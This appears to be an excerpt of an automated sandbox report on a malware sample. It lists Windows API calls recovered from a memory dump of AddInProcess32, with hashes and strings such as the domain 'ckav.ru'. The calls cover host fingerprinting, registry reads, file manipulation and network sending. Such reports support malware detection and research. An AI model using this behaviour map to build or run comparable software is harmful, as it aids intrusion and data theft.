                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreatePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3672724799-0
                                                                                                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                                                                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                                                                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                                                                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                                                                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$CreateFreeProcessThread_wmemset
                                                                                                • String ID: ckav.ru
                                                                                                • API String ID: 2915393847-2696028687
                                                                                                • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                                                                • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                                                                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                • _wmemset.LIBCMT ref: 0040634F
                                                                                                  • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocateNameProcessUser_wmemset
                                                                                                • String ID: CA
                                                                                                • API String ID: 2078537776-1052703068
                                                                                                • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                                                                • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                                                                                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                                                                APIs
                                                                                                • SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Path
                                                                                                • String ID: 5,A
                                                                                                • API String ID: 2875597873-3842761921
                                                                                                • Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                                                                • Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
                                                                                                • Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
                                                                                                • Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9
                                                                                                APIs
                                                                                                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationToken
                                                                                                • String ID: IDA
                                                                                                • API String ID: 4114910276-365204570
                                                                                                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                                                                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                                                                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                                                                APIs
                                                                                                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: s1@
                                                                                                • API String ID: 190572456-427247929
                                                                                                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                                                                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                                                                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 1425999871-0
                                                                                                • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                                • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                                APIs
                                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CheckMembershipToken
                                                                                                • String ID:
                                                                                                • API String ID: 1351025785-0
                                                                                                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                • SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocateProcessQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3318767951-0
                                                                                                • Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                                                                • Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
                                                                                                • Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
                                                                                                • Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$AllocateFolderPathProcess
                                                                                                • String ID:
                                                                                                • API String ID: 398210565-0
                                                                                                • Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                                                                • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                                                                                                • Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                                                                • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateDirectory
                                                                                                • String ID:
                                                                                                • API String ID: 4241100979-0
                                                                                                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                                APIs
                                                                                                • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoNativeSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1721193555-0
                                                                                                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                                APIs
                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileString
                                                                                                • String ID:
                                                                                                • API String ID: 1096422788-0
                                                                                                • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                                                                • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                                                                                                • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                                                                • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                                                                                                APIs
                                                                                                • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Value
                                                                                                • String ID:
                                                                                                • API String ID: 3702945584-0
                                                                                                • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                                                                • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                                                                                                • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                                                                • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                                                                                                APIs
                                                                                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: send
                                                                                                • String ID:
                                                                                                • API String ID: 2809346765-0
                                                                                                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                                APIs
                                                                                                • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum
                                                                                                • String ID:
                                                                                                • API String ID: 2928410991-0
                                                                                                • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                                                                • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                                                                                                • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                                                                • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                                                                                                APIs
                                                                                                • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileMove
                                                                                                • String ID:
                                                                                                • API String ID: 3562171763-0
                                                                                                • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                                • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                                • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                                • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                                • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                                • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                                APIs
                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                                APIs
                                                                                                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID:
                                                                                                • API String ID: 4033686569-0
                                                                                                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                                APIs
                                                                                                • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                                                                • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                                                                                                • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                                                                • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                                                                                                APIs
                                                                                                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFind
                                                                                                • String ID:
                                                                                                • API String ID: 1863332320-0
                                                                                                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
